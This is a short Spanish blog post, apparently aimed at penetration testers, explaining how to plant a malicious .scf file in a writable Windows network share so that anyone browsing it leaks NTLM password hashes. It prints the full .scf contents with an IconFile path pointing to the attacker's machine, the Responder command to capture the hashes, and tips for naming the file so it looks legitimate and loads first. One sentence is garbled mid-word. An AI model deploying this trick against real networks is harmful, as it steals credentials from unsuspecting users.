Usando un archivo scf malicioso dentro de un recurso compartido para obtener los hashes de los usuarios

Durante un test de intrusión es posible encontrarse con un recurso de red de un servidor Windows con permisos de escritura para todos. A parte de intentar obtener información sensible, hoy veíamos en el blog 1337red (nombre muy l33t) un truquito para abusar de este recurso y poder obtener los hashes de las contraseñas de todos los usuarios que naveguen por esa carpeta compartida.

Para ello, se utilizará un archivo scf malicioso. Si no conocéis este tipo de archivo, se trata de Shell Command File, es decir, un archivo de comandos de Windows Explorer, que nosotros usaremos para enviar earchivo scf malicioso.l hash NTLMv1/2 a nosotros, al atacante.

El siguiente código debe colocarse dentro del archivo .scf:
[Shell]

Command=2

IconFile=\\192.168.0.12\share\test.ico

[Taskbar]

Command=ToggleDesktop

NOTA: Reemplazar la dirección IP por la del Responder correspondiente

Al poner el nombre del archivo SCF, se recomienda usar uno que coincida más o menos con el contenido del recurso compartido para que parezca que pertenece al mismo. Además, el archivo debe ser visto por el Explorador de Windows, así que es aconsejable agregar un símbolo ~ o un símbolo @ al comienzo del nombre del archivo para asegurarse de que el archivo se ejecute tan pronto como se navegue por el recurso compartido. Esto colocará también el archivo en la parte superior del directorio.



Una vez que hemos creado y situado el fichero SCF malicioso en el recurso compartido, tendremos que levantar el Responder:
responder -wrf --lm -v -I eth0

Ahora, cuando cualquier usuario explore el recurso compartido , ¡recibiremos su hash!


Fuente: Using a SCF file to Gather Hashes

1 comentarios :

  1. https://4null0.blogspot.com.es/2017/11/hashes-smb-cada-vez-mas-facil-obtenerlos.html

    ResponderEliminar